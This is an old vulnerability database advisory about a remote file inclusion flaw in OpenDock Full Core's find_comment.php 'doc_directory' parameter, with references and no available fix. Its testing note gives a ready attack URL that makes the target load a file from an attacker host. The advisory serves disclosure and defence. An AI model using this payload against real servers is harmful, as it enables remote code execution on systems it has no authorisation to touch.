OpenDock Full Core sw/lib_comment/find_comment.php doc_directory Variable Remote File Inclusion

2006-10-16T11:48:49
ID OSVDB:29912
Type osvdb
Reporter Matdhule(matdhule@gmail.com)
Modified 2006-10-16T11:48:49

Description

Vulnerability Description

OpenDock Full Core contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sw/lib_comment/find_comment.php not properly sanitizing user input supplied to the 'doc_directory' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

OpenDock Full Core contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sw/lib_comment/find_comment.php not properly sanitizing user input supplied to the 'doc_directory' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[OpenDockFullCore_Path]/sw/lib_comment/find_comment.php?doc_directory=http://[attacker]/inject.txt

References:

Vendor URL: http://web.opendock.net/ Secunia Advisory ID:22410 Related OSVDB ID: 29908 Related OSVDB ID: 29909 Related OSVDB ID: 29914 Related OSVDB ID: 29910 Related OSVDB ID: 29911 Related OSVDB ID: 29913 Related OSVDB ID: 29906 Related OSVDB ID: 29907 ISS X-Force ID: 29578 Generic Exploit URL: http://www.milw0rm.com/exploits/2570 FrSIRT Advisory: ADV-2006-4052 CVE-2006-5392 Bugtraq ID: 20573